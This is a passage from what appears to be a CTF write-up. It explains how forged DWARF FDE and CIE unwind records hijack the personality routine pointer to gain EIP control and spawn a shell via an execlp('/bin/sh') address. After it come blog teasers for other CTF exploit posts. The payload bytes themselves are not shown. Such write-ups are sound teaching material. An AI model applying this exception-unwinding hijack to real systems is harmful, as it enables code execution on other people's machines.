This yields our payload to be:

We are almost there!!!

Above payload will result in data->ret  to contain a pointer to our FDE struct and return to _Unwind_Find_FDE.

In _Unwind_Find_FDE, nothing interesting happens, and the same (a pointer to our fake FDE struct) is returned.

We are now back to uw_frame_state_for function (line 1180 in unwind-dw2.c). Since fde is not null, extract_cie_info is called with the cie pointer that is based on our fde.

Looking at the get_cie function, we can see why we put 0xFFFFFFE4 for CIE_delta value in our FDE struct. With our setup, get_cie will return the CIE struct’s address, which will be right after our fake FDE struct (aka 0x40025088).

Now, we have 1 final function that we need to understand: extract_cie_info.

This function is mostly parsing stuff and filling in the _Unwind_Frame_State data based on the CIE record.

dwarf_cie struct has length, CIE_id, version, and augmentation — and depending on augmentation content, more data follows.

Here’s the values we set for our fake CIE struct:

Data that follows after augmentation string (code_alignment, data_alignment, return_addr_col) are read in first.
We chose these values just because we saw these in normal CIE struct, but it shouldn’t matter what the values are.

Then, the rest of the data is parsed as augmentation contents (aka ‘zPLR’).

  1. If the first byte is ‘z’, it sets fs->saw_z flag  and note that the length of the extra augmentation data (which follows the length itself) is 0x07.
  2. ‘P’ indicates a personality routine  is specified in CIE (extra) augmentation, and basically read the personality_ptr value (4-byte) based on the personality_enc encoding scheme — which we set as 0x0 to make it absptr type.
  3. ‘L’ indicates a byte showing how the LSDA pointer is encoded. No idea what that is, but it’s not relevant — we put 0x0.
  4. ‘R’ indicates a byte indicating how FDE addresses are encoded. We put some sane value that we saw earlier, but shouldn’t matter either.

Alright, now with some padding bytes to make the total length 0x1c, we are set.

Thus far, we have built the following payload:

And corresponding output when we run this payload against the binary:

YAY!!! WE HAVE EIP CONTROL!!!!111!!11!

Ok, now on to the final and easiest step: getting a shell.

4-5. Give me a shell

Remember (from a while ago…) that there was code that does execlp("/bin/sh", "/bin/sh", 0) ?
For those who don’t remember, it’s located at  0x8048E97 .

All we have to do at this point is to replace 0x41424344 (personality routine pointer) to 0x8048e97.

AND

Voila! We have our shell (and the flag, of course!)

 

5. Closing

I hope you enjoyed reading this write-up. (Although I suspect not.. due to its obscene length)

I apologize that this ended up being a LOT longer than I anticipated when I started writing, but I think it contains quite a bit of details that people can follow and reproduce the result.

Try it while their server is up!! Otherwise you will have to patch the binary such that the addresses work out.

Thank you for reading, and feel free to leave comments if you have any questions or suggestions.

 

Write-up by Cai (Brian Pak) [https://www.bpak.org]

 

GiTS 2014: gitsmsg

tl;drgitsmsg is a messaging server. A heap overflow led to arbitrary read / write and eventual code exec
after circumventing RELRO.

Read more

GiTS 2014: fuzzy

tl;dr – fuzzy is a “super secure parsing engine”, that includes a histogram function. The histogram ascii text uses a buffer on the stack, but will increment
buckets past the end of the buffer if non ascii text is provided, allowing us to
rop.

Read more

GiTS 2014: Gitzino

Gitzino was the 400-point crypto problem for Ghost in the Shellcode 2014. It looked like a standard
“predict-the-RNG” problem: there’s a PRNG, a card game, and hopefully the output it gives you
provides enough data about the internal state of the PRNG to predict the future and win the game
repeatedly.

Read more

Exploiting a Go Binary

Introduction

Earlier this year, tylerni7 showed us a proof of concept for a 32 bit Go exploit using this issue. geohot and I had a wager over who could get the first remote code execution on play.golang.org: he won, but just barely ;-). Props also to ricky for helping to find the underlying cause/writing the patch. Here is a summary of how we did it.

Note: play.golang.org is properly sandboxed, so code execution there does not actually let you do anything. Had this been a more serious bug that could actually be used for anything malicious, we would have reported it and not used it as a CTF problem.

This post is cross posted on my personal blog, original post there.

Read more